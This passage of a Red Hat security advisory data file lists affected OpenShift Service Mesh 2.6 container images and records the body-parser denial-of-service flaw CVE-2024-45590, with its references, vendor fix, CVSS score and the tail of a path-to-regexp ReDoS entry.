"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "path-to-regexp: Backtracking regular expressions cause ReDoS", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", 